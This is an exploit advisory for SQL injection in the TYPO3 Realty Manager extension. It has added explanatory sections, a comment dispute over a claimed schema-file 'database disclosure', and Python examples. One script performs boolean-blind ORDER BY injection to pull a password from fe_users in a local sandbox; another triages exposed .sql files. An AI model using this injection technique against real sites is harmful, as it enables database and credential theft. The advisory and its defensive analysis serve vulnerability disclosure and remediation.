Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 Database Disclosure / SQL Injection

Posted Feb 19, 2019
Authored by KingSkrupellos

Typo3 CMS Realty Manager tx_realty_pi1 version 2.0.0 suffers from database disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
MD5 | 5d7dec2aefebceae6a65631a827f8e8b

############################################################################################

# Exploit Title : Typo3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/02/2019
# Vendor Homepage : typo3.org ~ oliverklee.de
# Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
# extensions.typo3.org/extension/download/realty/2.0.0/zip/
# Software Information Link : extensions.typo3.org/extension/realty/
# github.com/TYPO3-svn-archive/realty
# Software Version : 2.0.0 (the author states that all earlier releases, 0.1.0 through 0.5.3, are affected as well)
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Description about Software :
***************************
Provides a plugin that displays realty objects (properties, real estate), including an image gallery for each object.

############################################################################################

# Impact :
***********
* The Realty Manager extension (tx_realty_pi1) for TYPO3, version 2.0.0 and, according to the author,
earlier versions, is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to
read or modify data in the application's database, or to exploit latent vulnerabilities in the
underlying database server. A remote, unauthenticated attacker can trigger the issue from a browser
with a specially crafted request to the plugin's list view. The injection point given below is the
orderBy parameter. An ORDER BY clause cannot be protected with a bound parameter (the sort column is
an identifier, not a value), so the correct fix is to map the request value onto a fixed allow-list
of sortable columns rather than to escape it.

* The advisory also reports an "information exposure / database disclosure" at
/typo3conf/ext/realty/ext_tables.sql. As the first comment below points out, that file is the
extension's own schema definition: it ships with every copy of the extension and is executed by the
TYPO3 Extension Manager / Install Tool to create or update the extension's tables. It contains
CREATE TABLE statements only. Fetching it reveals table and column names (which do help in crafting
the injection above) but no rows from the target's database, and in particular no authentication
credentials. Treat it as a minor fingerprinting / information disclosure issue (the extension's
presence and its schema), not as a database dump.

############################################################################################

# SQL Injection Exploit :
***********************

/index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]

(URL-decoded, the parameters are tx_realty_pi1[city], tx_realty_pi1[district] and
tx_realty_pi1[orderBy]. The injection point is the orderBy value, which the plugin presumably
uses to build the ORDER BY clause of its list query.)

# Database Disclosure Exploit :
***************************

/typo3conf/ext/realty/ext_tables.sql

(This is the extension's schema file, ext_tables.sql, shipped with the extension itself; see the
Impact section above and the comments below. It reveals table and column names, not database contents.)

############################################################################################

# Example SQL Database Error :
****************************
You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1

# The last built query :
***********************
SELECT COUNT(*) AS oelib_counter FROM tx_realty_objects
INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
WHERE 1=1 AND tx_realty_objects.deleted=0 AND tx_realty_objects.t3ver_state
<=0 AND tx_realty_objects.pid<>-1 AND tx_realty_objects.hidden=0 AND
tx_realty_objects.starttime<=1550508420 AND (tx_realty_objects.endtime=0 OR
tx_realty_objects.endtime>1550508420) AND tx_realty_cities.deleted=0 AND
house_type = 2 AND tx_realty_objects.city = 1 AND tx_realty_objects.project_id = LIMIT 0,1

#0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')

Note on this trace: the failing statement is a COUNT(*) query with no ORDER BY clause, and the
syntax error comes from an empty value spliced directly after `tx_realty_objects.project_id =` in
the WHERE clause. It therefore shows an unescaped filter value being concatenated into SQL, and does
not correspond to the orderBy parameter in the exploit URL above. It does confirm that request data
reaches the query without quoting and that the site returns verbose database errors, which makes
error-based injection possible in addition to the blind variant.
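To make the bug class concrete, here is an added example that is not code from the advisory, from the Realty Manager extension or from TYPO3. It builds a throw-away SQLite database with tables named after those in the trace above (constructed sample rows, not the real extension schema), shows a list query that concatenates the orderBy value the way a vulnerable plugin would, recovers a column of fe_users character by character using nothing but the order of the returned rows (so it works even when the site does not print SQL errors), and contrasts it with an allow-list version. The table layout, the column names and the fe_users row are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample schema and rows, named after the tables in the advisory's error trace.
# This is NOT the real Realty Manager schema; it is only enough to show the ORDER BY injection.
SAMPLE_DB = """
CREATE TABLE tx_realty_cities (uid INTEGER PRIMARY KEY, title TEXT, deleted INTEGER DEFAULT 0);
CREATE TABLE tx_realty_objects (uid INTEGER PRIMARY KEY, title TEXT, city INTEGER,
                                deleted INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0);
CREATE TABLE fe_users (uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO tx_realty_cities VALUES (1, 'Bonn', 0);
INSERT INTO tx_realty_objects VALUES (1, 'Flat A', 1, 0, 0), (2, 'Flat B', 1, 0, 0), (3, 'House C', 1, 0, 0);
INSERT INTO fe_users VALUES (1, 'editor', '$P$constructed');  -- constructed value, not a real hash
"""

BASE_QUERY = (
    "SELECT tx_realty_objects.uid FROM tx_realty_objects "
    "INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid "
    "WHERE tx_realty_objects.deleted = 0 AND tx_realty_objects.hidden = 0 "
    "AND tx_realty_objects.city = ? "
)


def connect_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_DB)
    return conn


def list_objects_vulnerable(conn, city, order_by):
    """The bug class: city is bound, but tx_realty_pi1[orderBy] is concatenated into ORDER BY."""
    return [r[0] for r in conn.execute(BASE_QUERY + "ORDER BY " + order_by, (city,))]


# Hardened version: map the request value onto a fixed column; nothing from the request reaches SQL.
ALLOWED_ORDER_BY = {"uid": "tx_realty_objects.uid", "title": "tx_realty_objects.title"}


def list_objects_hardened(conn, city, order_by, direction="ASC"):
    column = ALLOWED_ORDER_BY.get(order_by)
    if column is None or direction not in ("ASC", "DESC"):
        raise ValueError("orderBy/direction not in allow-list")
    return [r[0] for r in conn.execute(BASE_QUERY + f"ORDER BY {column} {direction}", (city,))]


def leak_bit(conn, condition):
    """Boolean-based blind injection through ORDER BY: a true condition reverses the row order.
    No error message is needed; the attacker reads one bit from which listing comes back."""
    payload = f"(CASE WHEN ({condition}) THEN -tx_realty_objects.uid ELSE tx_realty_objects.uid END)"
    return list_objects_vulnerable(conn, 1, payload) == [3, 2, 1]


def extract_via_row_order(conn, column, length):
    """Recover `length` characters of fe_users.<column> for uid 1, one bit per request,
    by binary-searching each character's code point over printable ASCII (32..126)."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"(SELECT unicode(substr({column}, {pos}, 1)) FROM fe_users WHERE uid = 1) > {mid}"
            if leak_bit(conn, cond):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = connect_sample_db()
    print("normal order    :", list_objects_vulnerable(db, 1, "tx_realty_objects.uid"))
    print("leaked password :", extract_via_row_order(db, "password", 4))
    try:
        list_objects_hardened(db, 1, "(CASE WHEN 1=1 THEN 1 END)")
    except ValueError as e:
        print("hardened rejects:", e)
```

Each character costs about seven requests, and the only observable difference between a true and a false guess is which object is listed first, which is why a sortable-column parameter is a high-value injection point even on sites that suppress database errors. The allow-list is the only sound fix: the sort column is an identifier, and no escaping function or prepared-statement placeholder applies to it.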

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################

Comments (2)

osvdb

# Database Disclosure Exploit :

Negative. ext_table.sql is part of the distribution and used to set up a database:

#
# Table structure for table 'tx_realty_objects'
#
CREATE TABLE tx_realty_objects (
uid int(11) unsigned NOT NULL auto_increment,
pid int(11) DEFAULT '0' NOT NULL,
tstamp int(11) DEFAULT '0' NOT NULL,

This is not disclosing the database on the target system. This is one of many so-called database disclosures from KingSkrupellos that are wrong.

Comment by osvdb
2019-02-20 22:44:55 UTC
kingskrupellos

Dear osvdb;

It is not wrong. Everything is correct [ true ] about ext_tables.sql and its database topic.
Because, for example:
Each extension in TYPO3 CMS can bring the file ext_tables.sql that defines which tables and fields the extension needs.
Gathering all ext_tables.sql thus defines the full set of tables, fields and indexes of a TYPO3 instance to unfold its full feature set.
Preparing the database =>
The preparation of the database primarily covers the creation of the database tables.
The commands for the creation are done in SQL. The code is put into the file ext_tables.sql which itself is located on the top level of the extension directory.
Preparing the tables of the Domain Objects
Let's have a look at the definition of the database table which will aggregate the objects of the class \MyVendor\SjrOffers\Domain\Model\Organization:
ext_tables.sql
CREATE TABLE tx_sjroffers_domain_model_organization (
uid int(11) unsigned DEFAULT 0 NOT NULL auto_increment,
pid int(11) DEFAULT 0 NOT NULL,

name varchar(255) NOT NULL,
address text NOT NULL,
telephone_number varchar(80) NOT NULL,
telefax_number varchar(80) NOT NULL,
url varchar(80) NOT NULL,
email_address varchar(80) NOT NULL,
description text NOT NULL,
image varchar(255) NOT NULL,
contacts int(11) NOT NULL,
offers int(11) NOT NULL,
administrator int(11) NOT NULL,

tstamp int(11) unsigned DEFAULT 0 NOT NULL,
crdate int(11) unsigned DEFAULT 0 NOT NULL,
deleted tinyint(4) unsigned DEFAULT 0 NOT NULL,
hidden tinyint(4) unsigned DEFAULT 0 NOT NULL,
sys_language_uid int(11) DEFAULT 0 NOT NULL,
l18n_parent int(11) DEFAULT 0 NOT NULL,
l18n_diffsource mediumblob NOT NULL,
access_group int(11) DEFAULT 0 NOT NULL,

PRIMARY KEY (uid),
KEY parent (pid)
);
CREATE TABLE instructs the database to create a new table named tx_sjroffers_domain_model_organization. The table's name is derived from the Extbase convention which describes that class names are written in lowercase retaining the underlines.
Note
The file ext_tables.sql is executed whenever the extension is installed. Nevertheless, TYPO3 is smart enough not to overwrite an existing database table. On the contrary it deduces the differences between the new and the existing table and just adds those additional information.
This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
This file should contain a table structure dump of the tables used by the extension.
It is used for evaluation of the database structure and is therefore important to check and update the database
when an extension is enabled. If you add additional fields (or depend on certain fields) to existing tables,
you can also put them here. In that case, insert a CREATE TABLE structure for that table,
but remove all lines except the ones defining the fields you need. The ext_tables.sql file may
not necessarily be dumpable directly to MySQL (because of the semi-complete table definitions
allowed defining only required fields.). But the EM or Install Tool can handle this.
The only very important thing is that the syntax of the content is exactly like MySQL
made it so that the parsing and analysis routines of the EM don't get confused.
About The ext_tables.sql files =>
As mentioned before, all data definition statements are stored in files called ext_tables.sql which may be present in any extension.
The peculiarity is that these files may not always contain a complete and valid SQL data definition. For example, system extension "rsaauth" defines a new table for storing RSA keys:

CREATE TABLE tx_rsaauth_keys (
uid int(11) NOT NULL auto_increment,
pid int(11) DEFAULT '0' NOT NULL,
crdate int(11) DEFAULT '0' NOT NULL,
key_value text,

PRIMARY KEY (uid),
KEY crdate (crdate)
);
This is a complete and valid SQL data definition. However system extension "css_styled_content" extends the "tt_content" table with additional fields. It also provides these changes in the form of a SQL CREATE TABLE statement:

CREATE TABLE tt_content (
header_position varchar(6) DEFAULT '' NOT NULL,
image_compression tinyint(3) unsigned DEFAULT '0' NOT NULL,
image_effects tinyint(3) unsigned DEFAULT '0' NOT NULL,
image_noRows tinyint(3) unsigned DEFAULT '0' NOT NULL,
section_frame int(11) unsigned DEFAULT '0' NOT NULL,
spaceAfter smallint(5) unsigned DEFAULT '0' NOT NULL,
spaceBefore smallint(5) unsigned DEFAULT '0' NOT NULL,
table_bgColor int(11) unsigned DEFAULT '0' NOT NULL,
table_border tinyint(3) unsigned DEFAULT '0' NOT NULL,
table_cellpadding tinyint(3) unsigned DEFAULT '0' NOT NULL,
table_cellspacing tinyint(3) unsigned DEFAULT '0' NOT NULL
);
The classes which take care of assembling the complete SQL data definition will compile all the CREATE TABLE statements for a given table and turn it into a single CREATE TABLE statement. If the table already exists, missing fields are isolated and ALTER TABLE statements are proposed instead.
What this means is that - as an extension developer - you should always have only CREATE TABLE statements in your ext_tables.sql files, the system will handle them as needed.
If you don't believe, you can check here. No, they are true; you are wrong, osvdb. This is the reality.
docs.typo3.org/typo3cms/CoreApiReference/ApiOverview/Database/DatabaseUpgrade/Index.html
docs.typo3.org/typo3cms/ExtbaseFluidBook/6-Persistence/1-prepare-the-database.html

Comment by kingskrupellos
2019-02-21 00:18:41 UTC
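The disagreement in the two comments above comes down to one check: does the reachable .sql file contain row data, or only CREATE TABLE statements? The following is an added example, not part of the advisory or of either comment, that classifies the body of such a file so a "database disclosure" report can be triaged before it is filed. The two sample bodies are constructed for the example (a shortened ext_tables.sql-style schema and a mysqldump-style backup); be_users and fe_users are TYPO3's backend and frontend user tables, the ones whose rows would make a real disclosure serious.

```python
import re

# Statement kinds that separate a schema file from a data dump.
CREATE_RE = re.compile(r"^\s*CREATE\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?", re.I | re.M)
INSERT_RE = re.compile(r"^\s*(?:INSERT|REPLACE)\s+INTO\s+`?(\w+)`?", re.I | re.M)
# pg_dump writes row data as COPY <table> (...) FROM stdin; blocks.
COPY_RE = re.compile(r'^\s*COPY\s+(?:\w+\.)?"?(\w+)"?.*\bFROM\s+stdin', re.I | re.M)
DUMP_HEADER_RE = re.compile(r"^--\s*(?:MySQL|MariaDB) dump|^--\s*PostgreSQL database dump", re.I | re.M)

# TYPO3 tables holding credentials; data from these is what a genuine disclosure would expose.
CREDENTIAL_TABLES = {"be_users", "fe_users"}


def classify_sql_exposure(body: str) -> dict:
    """Classify the text of a publicly reachable .sql file.

    'schema-only' : CREATE TABLE statements only (e.g. a TYPO3 ext_tables.sql), no row data
    'data-dump'   : contains INSERT/REPLACE/COPY data, i.e. actual database contents
    'not-sql'     : neither; probably an error page or unrelated content
    """
    defined = set(CREATE_RE.findall(body))
    with_data = set(INSERT_RE.findall(body)) | set(COPY_RE.findall(body))
    if with_data:
        verdict = "data-dump"
    elif defined:
        verdict = "schema-only"
    else:
        verdict = "not-sql"
    return {
        "verdict": verdict,
        "tables_defined": sorted(defined),
        "tables_with_data": sorted(with_data),
        "credentials_exposed": sorted(with_data & CREDENTIAL_TABLES),
        "looks_like_dump_tool_output": bool(DUMP_HEADER_RE.search(body)),
    }


# Constructed sample 1: the kind of content served at /typo3conf/ext/<ext>/ext_tables.sql
# (a shortened schema fragment in the style quoted in the comments above).
EXT_TABLES_SQL = """\
#
# Table structure for table 'tx_realty_objects'
#
CREATE TABLE tx_realty_objects (
  uid int(11) unsigned NOT NULL auto_increment,
  pid int(11) DEFAULT '0' NOT NULL,
  tstamp int(11) DEFAULT '0' NOT NULL,
  PRIMARY KEY (uid),
  KEY parent (pid)
);

CREATE TABLE tx_realty_cities (
  uid int(11) unsigned NOT NULL auto_increment,
  title varchar(255) DEFAULT '' NOT NULL,
  PRIMARY KEY (uid)
);
"""

# Constructed sample 2: a mysqldump-style backup left in the web root.
DUMP_SQL = """\
-- MySQL dump 10.13  Distrib 5.7.25, for Linux (x86_64)
--
DROP TABLE IF EXISTS `fe_users`;
CREATE TABLE `fe_users` (
  `uid` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(255) NOT NULL DEFAULT '',
  `password` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`uid`)
);
INSERT INTO `fe_users` VALUES (1,'jdoe','$P$constructedhash');
"""

# Constructed sample 3: what a 404 handler returns for a path that does not exist.
NOT_SQL = "<html><body><h1>404 Not Found</h1></body></html>"

if __name__ == "__main__":
    for name, body in (("ext_tables.sql", EXT_TABLES_SQL), ("backup.sql", DUMP_SQL), ("404", NOT_SQL)):
        print(name, "->", classify_sql_exposure(body))
```

Applied to the path in this advisory, the body classifies as schema-only with no table carrying data, which is the result the first comment describes. Only a data-dump verdict, and above all a non-empty credentials_exposed list, justifies the "download the database" wording used in the Impact section.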